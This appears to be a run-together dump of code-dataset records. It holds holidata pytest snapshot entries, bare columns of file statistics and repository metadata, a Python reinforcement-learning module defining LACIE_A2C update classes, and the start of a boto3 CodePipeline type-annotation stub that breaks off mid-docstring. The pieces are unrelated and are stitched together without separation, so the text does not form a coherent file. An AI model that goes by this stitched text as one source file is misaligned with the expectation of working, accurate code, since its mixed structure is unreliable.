snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_FI-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_FI-2021] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2011] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2011] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2012] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2012] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2013] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2013] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2014] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2014] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2015] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2015] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2016] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2016] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2017] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2017] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2018] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2018] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2019] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2019] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2020] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2020] 1.py')
snapshots['test_holidata_produces_holidays_for_locale_and_year[sv_SE-2021] 1'] = FileSnapshot('snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[sv_SE-2021] 1.py')
| 92.061286
| 184
| 0.875984
| 9,925
| 61,589
| 4.836877
| 0.007154
| 0.247469
| 0.274966
| 0.384952
| 0.996709
| 0.996709
| 0.996709
| 0.996709
| 0.996709
| 0.996709
| 0
| 0.055436
| 0.032587
| 61,589
| 668
| 185
| 92.199102
| 0.750277
| 0.001007
| 0
| 0
| 0
| 0
| 0.815292
| 0.777745
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008982
| 0
| 0.008982
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
079cbc31e02ef8bb51e610cba7126606619a38d5
| 11,116
|
py
|
Python
|
core/algorithms/lacie/lacie_a2c.py
|
lehduong/Input-Dependent-Baseline
|
cb140338eb35a568fe1d320d0b8e52b739470b59
|
[
"Apache-2.0"
] | 4
|
2020-12-05T18:51:03.000Z
|
2022-01-03T16:04:35.000Z
|
core/algorithms/lacie/lacie_a2c.py
|
lehduong/Job-Scheduling-with-Reinforcement-Learning
|
cb140338eb35a568fe1d320d0b8e52b739470b59
|
[
"Apache-2.0"
] | null | null | null |
core/algorithms/lacie/lacie_a2c.py
|
lehduong/Job-Scheduling-with-Reinforcement-Learning
|
cb140338eb35a568fe1d320d0b8e52b739470b59
|
[
"Apache-2.0"
] | null | null | null |
import torch
import torch.nn as nn
from itertools import chain
from torch import optim
from core.algorithms.lacie.base_lacie import LacieAlgo
from core.storage import LacieStorage
class LACIE_A2C(LacieAlgo):
"""
Meta Input-dependent Baseline A2C. \
This A2C class leverages input-dependent baseline, which is learned with meta learning, \
to reduce variance when updating parameters
"""
def __init__(self,
actor_critic,
value_coef,
entropy_coef,
regularize_coef,
eps=None,
alpha=None,
state_to_input_seq=None,
lr=1e-3,
max_grad_norm=None,
expert=None,
il_coef=1,
num_cpc_steps=10,
cpc_lr=1e-3):
super().__init__(actor_critic=actor_critic,
lr=lr,
value_coef=value_coef,
entropy_coef=entropy_coef,
regularize_coef=regularize_coef,
state_to_input_seq=state_to_input_seq,
expert=expert,
il_coef=il_coef,
num_cpc_steps=num_cpc_steps,
cpc_lr=cpc_lr)
self.max_grad_norm = max_grad_norm
def update(self, rollouts):
obs_shape = rollouts.obs.size()[2:]
action_shape = rollouts.actions.size()[-1]
num_steps, num_processes, _ = rollouts.rewards.size()
# Estimate baseline
values, action_log_probs, dist_entropy, _ = self.actor_critic.evaluate_actions(
rollouts.obs[:-1].view(-1, *obs_shape),
rollouts.recurrent_hidden_states[:-1].view(
-1, self.actor_critic.recurrent_hidden_state_size),
rollouts.masks[:-1].view(-1, 1),
rollouts.actions.view(-1, action_shape))
values = values.view(num_steps, num_processes, 1)
action_log_probs = action_log_probs.view(num_steps, num_processes, 1)
advantages = rollouts.returns[:-1] - values
returns = rollouts.returns[:-1]
# Value loss for updating Critic Net
value_loss = advantages.pow(2).mean()
# LEARNING CONTRASTIVE PREDICTIVE MODEL
# compute contrastive loss and accuracy
contrastive_loss, contrastive_accuracy, regularize_loss = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, returns)
contrastive_loss = contrastive_loss.item()
regularize_loss = regularize_loss.item()
# computed weighted advantage according to its dependency with input sequences
# learn cpc model for n steps
for _ in range(self.num_cpc_steps):
cpc_loss, _, cpc_regularize_loss = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, returns)
self.cpc_optimizer.zero_grad()
(cpc_loss + self.regularize_coef * cpc_regularize_loss).backward()
# nn.utils.clip_grad_norm_(chain(self.advantage_encoder.parameters(),
# self.input_seq_encoder.parameters(),
# self.state_encoder.parameters(),
# self.condition_encoder.parameters(),
# self.action_encoder.parameters()),
# self.max_grad_norm)
self.cpc_optimizer.step()
# IMPORTANCE: we need to compute the weighted before learn cpc model
# FIXME: Move to training to top to verify if the model can estimate density ratio
weighted_advantages = self.compute_weighted_advantages(
rollouts.obs, rollouts.actions, rollouts.masks, returns) - values
# Action loss of Actor Net
action_loss = -(weighted_advantages.detach() * action_log_probs).mean()
# IMITATION LEARNING
imitation_loss, imitation_accuracy = torch.tensor(
0).to(rollouts.obs.device), 0
if self.expert:
imitation_loss, imitation_accuracy = self.imitation_learning(
rollouts.obs[:-1].view(-1, *obs_shape),
rollouts.recurrent_hidden_states[0].view(
-1, self.actor_critic.recurrent_hidden_state_size),
rollouts.masks[:-1].view(-1, 1),
self.expert)
self.optimizer.zero_grad()
(imitation_loss * self.il_coef + value_loss * self.value_coef + action_loss -
dist_entropy * self.entropy_coef).backward()
nn.utils.clip_grad_norm_(self.actor_critic.parameters(),
self.max_grad_norm)
self.optimizer.step()
self.after_update()
return {
'value loss': value_loss.item(),
'action loss': action_loss.item(),
'entropy loss': dist_entropy.item(),
'imitation loss': imitation_loss.item(),
'imitation accuracy': imitation_accuracy,
'contrastive loss': contrastive_loss,
'contrastive accuracy': contrastive_accuracy,
'regularize loss': regularize_loss
}
class LACIE_A2C_Memory(LACIE_A2C):
def __init__(self,
actor_critic,
value_coef,
entropy_coef,
regularize_coef,
eps=None,
alpha=None,
state_to_input_seq=None,
lr=1e-3,
max_grad_norm=None,
expert=None,
il_coef=1,
num_cpc_steps=10,
lacie_batch_size=64,
lacie_buffer=None,
use_memory_to_pred_weights=False,
cpc_lr=1e-3):
super().__init__(actor_critic,
value_coef,
entropy_coef,
regularize_coef,
eps,
alpha,
state_to_input_seq,
lr,
max_grad_norm,
expert,
il_coef,
num_cpc_steps,
cpc_lr)
self.lacie_batch_size = lacie_batch_size
self.lacie_buffer = lacie_buffer
self.use_memory_to_pred_weights = use_memory_to_pred_weights
def update(self, rollouts):
obs_shape = rollouts.obs.size()[2:]
action_shape = rollouts.actions.size()[-1]
num_steps, num_processes, _ = rollouts.rewards.size()
# Estimate baseline
values, action_log_probs, dist_entropy, _ = self.actor_critic.evaluate_actions(
rollouts.obs[:-1].view(-1, *obs_shape),
rollouts.recurrent_hidden_states[:-1].view(
-1, self.actor_critic.recurrent_hidden_state_size),
rollouts.masks[:-1].view(-1, 1),
rollouts.actions.view(-1, action_shape))
values = values.view(num_steps, num_processes, 1)
action_log_probs = action_log_probs.view(num_steps, num_processes, 1)
advantages = rollouts.returns[:-1] - values
returns = rollouts.returns[:-1]
# Value loss for updating Critic Net
value_loss = advantages.pow(2).mean()
# LEARNING CONTRASTIVE PREDICTIVE MODEL
# update LACIE_Storage
self.lacie_buffer.insert(rollouts, advantages.detach())
# compute contrastive loss and accuracy
contrastive_loss, contrastive_accuracy, regularize_loss = self.compute_contrastive_loss(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
contrastive_loss = contrastive_loss.item()
regularize_loss = regularize_loss.item()
# computed weighted advantage according to its dependency with input sequences
# learn cpc model for n steps
for _ in range(self.num_cpc_steps):
data = self.lacie_buffer.sample()
obs, actions, masks, sample_advantages = data['obs'], data['actions'], data['masks'], data['advantages']
cpc_loss, _, cpc_regularize_loss = self.compute_contrastive_loss(
obs, actions, masks, sample_advantages)
self.cpc_optimizer.zero_grad()
(cpc_loss + self.regularize_coef * cpc_regularize_loss).backward()
# nn.utils.clip_grad_norm_(chain(self.advantage_encoder.parameters(),
# self.input_seq_encoder.parameters(),
# self.state_encoder.parameters(),
# self.condition_encoder.parameters(),
# self.action_encoder.parameters()),
# self.max_grad_norm)
self.cpc_optimizer.step()
# IMPORTANCE: we need to compute the weighted before learn cpc model
# FIXME: Move the cpc training on top to verify if it can learn useful estimation
if not self.use_memory_to_pred_weights:
weighted_advantages = self.compute_weighted_advantages(
rollouts.obs, rollouts.actions, rollouts.masks, advantages.detach())
else:
data = self.lacie_buffer.sample_most_recent()
obs, actions, masks, sample_advantages = data['obs'], data[
'actions'], data['masks'], data['advantages']
weighted_advantages = self.compute_weighted_advantages(
obs, actions, masks, sample_advantages, rollouts.actions.shape[1])
# Action loss of Actor Net
action_loss = -(weighted_advantages.detach() * action_log_probs).mean()
# IMITATION LEARNING
imitation_loss, imitation_accuracy = torch.tensor(
0).to(rollouts.obs.device), 0
if self.expert:
imitation_loss, imitation_accuracy = self.imitation_learning(
rollouts.obs[:-1].view(-1, *obs_shape),
rollouts.recurrent_hidden_states[0].view(
-1, self.actor_critic.recurrent_hidden_state_size),
rollouts.masks[:-1].view(-1, 1),
self.expert)
self.optimizer.zero_grad()
(imitation_loss * self.il_coef + value_loss * self.value_coef + action_loss -
dist_entropy * self.entropy_coef).backward()
nn.utils.clip_grad_norm_(self.actor_critic.parameters(),
self.max_grad_norm)
self.optimizer.step()
self.after_update()
return {
'value loss': value_loss.item(),
'action loss': action_loss.item(),
'entropy loss': dist_entropy.item(),
'imitation loss': imitation_loss.item(),
'imitation accuracy': imitation_accuracy,
'contrastive loss': contrastive_loss,
'contrastive accuracy': contrastive_accuracy,
'regularize loss': regularize_loss
}
| 42.26616
| 116
| 0.578715
| 1,166
| 11,116
| 5.228988
| 0.134648
| 0.039364
| 0.024602
| 0.019682
| 0.86436
| 0.824996
| 0.808758
| 0.80761
| 0.794981
| 0.777268
| 0
| 0.009485
| 0.336092
| 11,116
| 262
| 117
| 42.427481
| 0.816667
| 0.163458
| 0
| 0.73913
| 0
| 0
| 0.03051
| 0
| 0
| 0
| 0
| 0.003817
| 0
| 1
| 0.021739
| false
| 0
| 0.032609
| 0
| 0.076087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6af88666f89d9491a21163c4ad8f94d6f5132101
| 199,266
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/codepipeline/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/codepipeline/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/codepipeline/client.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def acknowledge_job(self, jobId: str, nonce: str) -> Dict:
"""
Returns information about a specified job and whether that job has been received by the job worker. Only used for custom actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/AcknowledgeJob>`_
**Request Syntax**
::
response = client.acknowledge_job(
jobId='string',
nonce='string'
)
**Response Syntax**
::
{
'status': 'Created'|'Queued'|'Dispatched'|'InProgress'|'TimedOut'|'Succeeded'|'Failed'
}
**Response Structure**
- *(dict) --*
Represents the output of an AcknowledgeJob action.
- **status** *(string) --*
Whether the job worker has received the specified job.
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID of the job for which you want to confirm receipt.
:type nonce: string
:param nonce: **[REQUIRED]**
A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Get this number from the response of the PollForJobs request that returned this job.
:rtype: dict
:returns:
"""
pass
def acknowledge_third_party_job(self, jobId: str, nonce: str, clientToken: str) -> Dict:
"""
Confirms a job worker has received the specified job. Only used for partner actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/AcknowledgeThirdPartyJob>`_
**Request Syntax**
::
response = client.acknowledge_third_party_job(
jobId='string',
nonce='string',
clientToken='string'
)
**Response Syntax**
::
{
'status': 'Created'|'Queued'|'Dispatched'|'InProgress'|'TimedOut'|'Succeeded'|'Failed'
}
**Response Structure**
- *(dict) --*
Represents the output of an AcknowledgeThirdPartyJob action.
- **status** *(string) --*
The status information for the third party job, if any.
:type jobId: string
:param jobId: **[REQUIRED]**
The unique system-generated ID of the job.
:type nonce: string
:param nonce: **[REQUIRED]**
A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Get this number from the response to a GetThirdPartyJobDetails request.
:type clientToken: string
:param clientToken: **[REQUIRED]**
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:rtype: dict
:returns:
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
def create_custom_action_type(self, category: str, provider: str, version: str, inputArtifactDetails: Dict, outputArtifactDetails: Dict, settings: Dict = None, configurationProperties: List = None) -> Dict:
"""
Creates a new custom action that can be used in all pipelines associated with the AWS account. Only used for custom actions.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/CreateCustomActionType>`_
**Request Syntax**
::
response = client.create_custom_action_type(
category='Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
provider='string',
version='string',
settings={
'thirdPartyConfigurationUrl': 'string',
'entityUrlTemplate': 'string',
'executionUrlTemplate': 'string',
'revisionUrlTemplate': 'string'
},
configurationProperties=[
{
'name': 'string',
'required': True|False,
'key': True|False,
'secret': True|False,
'queryable': True|False,
'description': 'string',
'type': 'String'|'Number'|'Boolean'
},
],
inputArtifactDetails={
'minimumCount': 123,
'maximumCount': 123
},
outputArtifactDetails={
'minimumCount': 123,
'maximumCount': 123
}
)
**Response Syntax**
::
{
'actionType': {
'id': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'settings': {
'thirdPartyConfigurationUrl': 'string',
'entityUrlTemplate': 'string',
'executionUrlTemplate': 'string',
'revisionUrlTemplate': 'string'
},
'actionConfigurationProperties': [
{
'name': 'string',
'required': True|False,
'key': True|False,
'secret': True|False,
'queryable': True|False,
'description': 'string',
'type': 'String'|'Number'|'Boolean'
},
],
'inputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
},
'outputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
}
}
}
**Response Structure**
- *(dict) --*
Represents the output of a CreateCustomActionType operation.
- **actionType** *(dict) --*
Returns information about the details of an action type.
- **id** *(dict) --*
Represents information about an action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **settings** *(dict) --*
The settings for the action type.
- **thirdPartyConfigurationUrl** *(string) --*
The URL of a sign-up page where users can sign up for an external service and perform initial configuration of the action provided by that service.
- **entityUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that provides a deep link to the resources of the external system, such as the configuration page for an AWS CodeDeploy deployment group. This link is provided as part of the action display within the pipeline.
- **executionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the top-level landing page for the external system, such as console page for AWS CodeDeploy. This link is shown on the pipeline view page in the AWS CodePipeline console and provides a link to the execution entity of the external action.
- **revisionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the page where customers can update or change the configuration of the external action.
- **actionConfigurationProperties** *(list) --*
The configuration properties for the action type.
- *(dict) --*
Represents information about an action configuration property.
- **name** *(string) --*
The name of the action configuration property.
- **required** *(boolean) --*
Whether the configuration property is a required value.
- **key** *(boolean) --*
Whether the configuration property is a key.
- **secret** *(boolean) --*
Whether the configuration property is secret. Secrets are hidden from all calls except for GetJobDetails, GetThirdPartyJobDetails, PollForJobs, and PollForThirdPartyJobs.
When updating a pipeline, passing * * * * * without changing any other values of the action will preserve the prior value of the secret.
- **queryable** *(boolean) --*
Indicates that the property will be used in conjunction with PollForJobs. When creating a custom action, an action can have up to one queryable property. If it has one, that property must be both required and not secret.
If you create a pipeline with a custom action type, and that custom action contains a queryable property, the value for that configuration property is subject to additional restrictions. The value must be less than or equal to twenty (20) characters. The value can contain only alphanumeric characters, underscores, and hyphens.
- **description** *(string) --*
The description of the action configuration property that will be displayed to users.
- **type** *(string) --*
The type of the configuration property.
- **inputArtifactDetails** *(dict) --*
The details of the input artifact for the action, such as its commit ID.
- **minimumCount** *(integer) --*
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --*
The maximum number of artifacts allowed for the action type.
- **outputArtifactDetails** *(dict) --*
The details of the output artifact of the action, such as its commit ID.
- **minimumCount** *(integer) --*
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --*
The maximum number of artifacts allowed for the action type.
:type category: string
:param category: **[REQUIRED]**
The category of the custom action, such as a build action or a test action.
.. note::
Although Source and Approval are listed as valid values, they are not currently functional. These values are reserved for future use.
:type provider: string
:param provider: **[REQUIRED]**
The provider of the service used in the custom action, such as AWS CodeDeploy.
:type version: string
:param version: **[REQUIRED]**
The version identifier of the custom action.
:type settings: dict
:param settings:
Returns information about the settings for an action type.
- **thirdPartyConfigurationUrl** *(string) --*
The URL of a sign-up page where users can sign up for an external service and perform initial configuration of the action provided by that service.
- **entityUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that provides a deep link to the resources of the external system, such as the configuration page for an AWS CodeDeploy deployment group. This link is provided as part of the action display within the pipeline.
- **executionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the top-level landing page for the external system, such as console page for AWS CodeDeploy. This link is shown on the pipeline view page in the AWS CodePipeline console and provides a link to the execution entity of the external action.
- **revisionUrlTemplate** *(string) --*
The URL returned to the AWS CodePipeline console that contains a link to the page where customers can update or change the configuration of the external action.
:type configurationProperties: list
:param configurationProperties:
The configuration properties for the custom action.
.. note::
You can refer to a name in the configuration properties of the custom action within the URL templates by following the format of {Config:name}, as long as the configuration property is both required and not secret. For more information, see `Create a Custom Action for a Pipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/how-to-create-custom-action.html>`__ .
- *(dict) --*
Represents information about an action configuration property.
- **name** *(string) --* **[REQUIRED]**
The name of the action configuration property.
- **required** *(boolean) --* **[REQUIRED]**
Whether the configuration property is a required value.
- **key** *(boolean) --* **[REQUIRED]**
Whether the configuration property is a key.
- **secret** *(boolean) --* **[REQUIRED]**
Whether the configuration property is secret. Secrets are hidden from all calls except for GetJobDetails, GetThirdPartyJobDetails, PollForJobs, and PollForThirdPartyJobs.
When updating a pipeline, passing * * * * * without changing any other values of the action will preserve the prior value of the secret.
- **queryable** *(boolean) --*
Indicates that the property will be used in conjunction with PollForJobs. When creating a custom action, an action can have up to one queryable property. If it has one, that property must be both required and not secret.
If you create a pipeline with a custom action type, and that custom action contains a queryable property, the value for that configuration property is subject to additional restrictions. The value must be less than or equal to twenty (20) characters. The value can contain only alphanumeric characters, underscores, and hyphens.
- **description** *(string) --*
The description of the action configuration property that will be displayed to users.
- **type** *(string) --*
The type of the configuration property.
:type inputArtifactDetails: dict
:param inputArtifactDetails: **[REQUIRED]**
The details of the input artifact for the action, such as its commit ID.
- **minimumCount** *(integer) --* **[REQUIRED]**
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --* **[REQUIRED]**
The maximum number of artifacts allowed for the action type.
:type outputArtifactDetails: dict
:param outputArtifactDetails: **[REQUIRED]**
The details of the output artifact of the action, such as its commit ID.
- **minimumCount** *(integer) --* **[REQUIRED]**
The minimum number of artifacts allowed for the action type.
- **maximumCount** *(integer) --* **[REQUIRED]**
The maximum number of artifacts allowed for the action type.
:rtype: dict
:returns:
"""
pass
def create_pipeline(self, pipeline: Dict) -> Dict:
"""
Creates a pipeline.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codepipeline-2015-07-09/CreatePipeline>`_
**Request Syntax**
::
response = client.create_pipeline(
pipeline={
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'artifactStores': {
'string': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string',
'region': 'string'
},
]
},
],
'version': 123
}
)
**Response Syntax**
::
{
'pipeline': {
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'artifactStores': {
'string': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string',
'region': 'string'
},
]
},
],
'version': 123
}
}
**Response Structure**
- *(dict) --*
Represents the output of a CreatePipeline action.
- **pipeline** *(dict) --*
Represents the structure of actions and stages to be performed in the pipeline.
- **name** *(string) --*
The name of the action to be performed.
- **roleArn** *(string) --*
The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
- **artifactStore** *(dict) --*
Represents information about the Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **artifactStores** *(dict) --*
A mapping of artifactStore objects and their corresponding regions. There must be an artifact store for the pipeline region and for each cross-region action within the pipeline. You can only use either artifactStore or artifactStores, not both.
If you create a cross-region action in your pipeline, you must use artifactStores.
- *(string) --*
- *(dict) --*
The Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --*
The type of the artifact store, such as S3.
- **location** *(string) --*
The Amazon S3 bucket used for storing the artifacts for a pipeline. You can specify the name of an S3 bucket but not a folder within the bucket. A folder to contain the pipeline artifacts is created for you based on the name of the pipeline. You can use any Amazon S3 bucket in the same AWS Region as the pipeline to store your pipeline artifacts.
- **encryptionKey** *(dict) --*
The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
- **id** *(string) --*
The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
- **type** *(string) --*
The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
- **stages** *(list) --*
The stage in which to perform the action.
- *(dict) --*
Represents information about a stage and its definition.
- **name** *(string) --*
The name of the stage.
- **blockers** *(list) --*
Reserved for future use.
- *(dict) --*
Reserved for future use.
- **name** *(string) --*
Reserved for future use.
- **type** *(string) --*
Reserved for future use.
- **actions** *(list) --*
The actions included in a stage.
- *(dict) --*
Represents information about an action declaration.
- **name** *(string) --*
The action declaration's name.
- **actionTypeId** *(dict) --*
The configuration information for the action type.
- **category** *(string) --*
A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
- **owner** *(string) --*
The creator of the action being called.
- **provider** *(string) --*
The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy. To reference a list of action providers by action type, see `Valid Action Types and Providers in CodePipeline <https://docs.aws.amazon.com/codepipeline/latest/userguide/reference-pipeline-structure.html#actions-valid-providers>`__ .
- **version** *(string) --*
A string that describes the action version.
- **runOrder** *(integer) --*
The order in which actions are run.
- **configuration** *(dict) --*
The action declaration's configuration.
- *(string) --*
- *(string) --*
- **outputArtifacts** *(list) --*
The name or ID of the result of the action declaration, such as a test or build artifact.
- *(dict) --*
Represents information about the output of an action.
- **name** *(string) --*
The name of the output of an artifact, such as "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
- **inputArtifacts** *(list) --*
The name or ID of the artifact consumed by the action, such as a test or build artifact.
- *(dict) --*
Represents information about an artifact to be worked on, such as a test or build artifact.
- **name** *(string) --*
The name of the artifact to be worked on, for example, "My App".
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
- **roleArn** *(string) --*
The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
- **region** *(string) --*
The action declaration's AWS Region, such as us-east-1.
- **version** *(integer) --*
The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
:type pipeline: dict
:param pipeline: **[REQUIRED]**
Represents the structure of actions and stages to be performed in the pipeline.
- **name** *(string) --* **[REQUIRED]**
The name of the action to be performed.
- **roleArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
- **artifactStore** *(dict) --*
Represents information about the Amazon S3 bucket where artifacts are stored for the pipeline.
- **type** *(string) --* **[REQUIRED]**
